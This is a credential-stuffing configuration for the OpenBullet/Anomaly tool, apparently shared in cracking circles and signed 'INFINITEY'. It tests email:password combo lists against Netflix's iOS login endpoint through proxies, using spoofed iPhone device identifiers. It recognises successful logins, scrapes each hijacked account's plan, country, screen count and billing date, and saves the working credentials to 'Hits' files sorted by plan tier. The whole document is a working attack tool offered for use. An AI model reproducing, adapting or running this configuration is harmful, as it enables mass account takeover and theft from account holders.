[SETTINGS]
{
  "Name": "Netflix IOS + CAPTURE + FILE OUTPUT",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2020-02-15T01:51:40.0862139+01:00",
  "AdditionalInfo": "No Lock",
  "Author": "INFINITEY",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION URLEncode "{\"action\":\"loginAction\",\"fields\":{\"userLoginId\":\"<USER>\",\"rememberMe\":\"true\",\"password\":\"<PASS>\"},\"verb\":\"POST\",\"mode\":\"login\",\"flow\":\"appleSignUp\"}" -> VAR "login" 

FUNCTION RandomString "22?d?d:6|1?d?d9:5" -> VAR "X-Netflix.Argo.abTests" 

FUNCTION RandomString "NFAPPL-02-IPHONE8=1-EB0874?h?h?h?h?h?h?h?h?h?h?h?hF1E4?h?h?h?h?h?h?h?h?h?h?h?h0F3034F05DF19404?h?h?h?h?h?h?h?h?h?h?h?h11" -> VAR "esn" 

REQUEST POST "https://ios.prod.ftl.netflix.com/iosui/user/12.17" 
  CONTENT "appInternalVersion=12.17.0&appVersion=12.17.0&callPath=%5B%22moneyball%22%2C%22appleSignUp%22%2C%22next%22%5D&config=%7B%22useSecureImages%22%3Atrue%2C%22billboardTrailerEnabled%22%3A%22false%22%2C%22clipsEnabled%22%3A%22false%22%2C%22titleCapabilityFlattenedShowEnabled%22%3A%22true%22%2C%22previewsBrandingEnabled%22%3A%22true%22%2C%22seasonRenewalPostPlayEnabled%22%3A%22true%22%2C%22aroGalleriesEnabled%22%3A%22true%22%2C%22interactiveFeatureSugarPuffsEnabled%22%3A%22true%22%2C%22showMoreDirectors%22%3Atrue%2C%22isDPShortPreviewEnabled%22%3Afalse%2C%22isDPAutoPlayIntoTitleEnabled%22%3Afalse%2C%22billboardEnabled%22%3A%22true%22%2C%22interactiveFeaturePIBEnabled%22%3A%22true%22%2C%22interactiveDataGatewayEnabled%22%3A%22true%22%2C%22warmerHasGenres%22%3Atrue%2C%22previewsRowEnabled%22%3A%22true%22%2C%22interactiveFeatureBadgeIconTestEnabled%22%3A%229.57.0%22%2C%22kidsMyListEnabled%22%3A%22true%22%2C%22isDPaudioSilencedByDefault%22%3Afalse%2C%22kidsBillboardEnabled%22%3A%22true%22%2C%22characterBarOnPhoneEnabled%22%3A%22true%22%2C%22contentWarningEnabled%22%3A%22true%22%2C%22postplayProductizationEnabled%22%3A%22true%22%2C%22bigRowEnabled%22%3A%22true%22%2C%22videoMerchInDPEnabled%22%3A%22false%22%2C%22interactiveFeatureAppUpdateDialogueEnabled%22%3A%22false%22%2C%22familiarityUIEnabled%22%3A%22false%22%2C%22bigrowNewUIEnabled%22%3A%22false%22%2C%22isAccountProfileLinkEnabled%22%3Afalse%2C%22interactiveFeatureTemplatesPrePlayEnabled%22%3A%22true%22%2C%22interactiveFeatureSugarPuffsPreplayEnabled%22%3A%22true%22%2C%22interactiveFeatureTemplatesEnabled%22%3A%22true%22%2C%22motionCharacterEnabled%22%3A%22true%22%2C%22billboardKidsTrailerEnabled%22%3A%22false%22%2C%22roarEnabled%22%3A%22true%22%2C%22topTenListEnabled%22%3A%22false%22%2C%22mobileCollectionsEnabled%22%3A%22false%22%2C%22previewsInBillboardEnabled%22%3A%22false%22%2C%22interactiveFeatureMinecraftEnabled%22%3A%22true%22%2C%22isCreatorHomeForRMEnabled%22%3A%22true%22%2C%22kidsParityLolomoDefaultsEnabled%22%3A%22false%22%2C%22titleGroupsRowPatchedEnabled%22%3A%22false%22%2C%22isDPInlineMerchEnabled%22%3Afalse%2C%22interactiveFeatureYouVsWildEnabled%22%3A%22true%22%2C%22mobileCollectionsTitleGroupsEnabled%22%3A%22false%22%2C%22kidsTrailers%22%3Atrue%2C%22isDPMerchButtonEnabled%22%3Afalse%7D&device_type=NFAPPL-02-&esn=<esn>&idiom=phone&iosVersion=13.3.1&isTablet=false&kids=false&languages=en-US&locale=en-US&maxDeviceWidth=375&method=call&model=saget&modelType=IPHONE8-1&odpAware=true&param=<login>&pathFormat=graph&pixelDensity=2.0&progressive=false&responseFormat=json" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "X-Netflix.Argo.abTests: <X-Netflix.Argo.abTests>" 
  HEADER "X-Netflix.client.appVersion: 12.17.0" 
  HEADER "X-Netflix.Argo.NFNSM: 9" 
  HEADER "Connection: close" 
  HEADER "Accept-Language: en-CA;q=1" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-Netflix.esn: <esn>" 
  HEADER "X-Netflix.client.idiom: phone" 
  HEADER "X-Netflix.Request.Routing: {\"path\":\"/nq/iosui/argo/~12.17.0/user\",\"control_tag\":\"iosui_argo\"}" 
  HEADER "User-Agent: Argo/12.17.0 (iPhone; iOS 13.3.1; Scale/2.00)" 
  HEADER "X-Netflix.request.client.user.guid: _fake-guid-for-activate" 
  HEADER "X-Netflix.client.type: argo" 
  HEADER "X-Netflix.Request.Attempt: 1" 
  HEADER "X-Netflix.client.iosVersion: 13.3.1" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"mode\":\"login" 
    KEY "unrecognized_email_consumption_only" 
  KEYCHAIN Success OR 
    KEY "mode\":\"memberHome" 

REQUEST GET "https://www.netflix.com/YourAccount?" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 

#Subscription PARSE "<SOURCE>" LR "\"currentPlanName\":\"" "\"" -> VAR "Subscriptions" 

#Subscription FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "Bu00E1sico" VALUE "Basic" 
  KEY "u57FAu672C" VALUE "Basic" 
  KEY "\\u03A4\\u03C5\\u03C0\\u03B9\\u03BA\\u03CC" VALUE "Basic" 
  KEY "\\" VALUE "" 
  "<Subscriptions>" -> CAP "Plan" 

#Country PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" -> CAP "Country" 

#DVD PARSE "<SOURCE>" LR "\"isDVD\":" "," -> CAP "DVD" 

#Trial PARSE "<SOURCE>" LR "\"isInFreeTrial\":" "," -> CAP "Trial" 

#Screens PARSE "<SOURCE>" LR "\"maxStreams\":" "," -> CAP "Screens" 

#HD PARSE "<SOURCE>" LR "\"hasHD\":" "," -> VAR "HD" 

#UHD PARSE "<SOURCE>" LR "\"hasUHD\":" "," -> VAR "UHD" 

#UHD_OR_HD_? PARSE "" LR "" "" -> VAR "H" "<HD>-<UHD>" "" 

#Quality FUNCTION Translate 
  KEY "false-false" VALUE "None" 
  KEY "true-false" VALUE "HD" 
  KEY "true-true" VALUE "UHD" 
  "<H>" -> CAP "Quality" 

PARSE "<SOURCE>" LR "\"nextBillingDate\"" "\"," -> VAR "1" 

FUNCTION Replace ":\"" "" "<1>" -> VAR "Next Billing" 

FUNCTION Replace "\\x2F" "/" "<Next Billing>" -> CAP "Next Billing" 

FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "{" VALUE "yes" 
  KEY "\"" VALUE "yes" 
  KEY "," VALUE "yes" 
  "<Next Billing>" -> VAR "yyyy" 

IF "<yyyy>" CONTAINS "yes"

PARSE "<SOURCE>" LR "Your next billing date is <b>" "</" CreateEmpty=FALSE -> CAP "Next Billing" 

ENDIF

FUNCTION CurrentUnixTime -> VAR "cur" 

FUNCTION UnixTimeToDate "<cur>" -> VAR "cur" 

FUNCTION Replace "/" "." "<cur>" -> VAR "cur" 

IF "<Plan>" Contains "Standard"

UTILITY File "Hits\\Netflix\\Standard\\<cur>.txt" AppendLines "====================================\\nCombo: <USER>:<PASS>\\nProxy: <PROXY>\\nPlan: <Plan>\\nScreens: <Screens>\\nQuality: <Quality>\\nDVD: <DVD>\\nNext Billing: <Next Billing>\\nCountry: <Country>\\nNetflix Config | by INFINITEY#6622\\n====================================" 

ENDIF
IF "<Plan>" Contains "Basic"

UTILITY File "Hits\\Netflix\\Basic\\<cur>.txt" AppendLines "====================================\\nCombo: <USER>:<PASS>\\nProxy: <PROXY>\\nPlan: <Plan>\\nScreens: <Screens>\\nQuality: <Quality>\\nDVD: <DVD>\\nNext Billing: <Next Billing>\\nCountry: <Country>\\nNetflix Config | by INFINITEY#6622\\n====================================" 

ENDIF
IF "<Plan>" Contains "Premium"

UTILITY File "Hits\\Netflix\\Premium\\<cur>.txt" AppendLines "====================================\\nCombo: <USER>:<PASS>\\nProxy: <PROXY>\\nPlan: <Plan>\\nScreens: <Screens>\\nQuality: <Quality>\\nDVD: <DVD>\\nNext Billing: <Next Billing>\\nCountry: <Country>\\nNetflix Config | by INFINITEY#6622\\n====================================" 

ENDIF

FUNCTION Constant "INFINITEY#6622" -> CAP "Netflix Config BY" 

